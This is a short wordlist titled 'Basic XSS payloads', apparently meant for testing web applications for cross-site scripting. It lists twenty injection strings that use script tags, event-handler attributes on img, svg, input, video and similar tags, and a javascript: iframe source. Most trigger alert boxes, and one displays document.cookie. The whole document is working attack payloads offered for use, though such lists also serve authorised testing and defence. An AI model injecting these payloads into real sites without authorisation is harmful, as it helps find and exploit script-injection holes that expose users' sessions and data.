# Basic XSS payloads
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(/XSS/)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
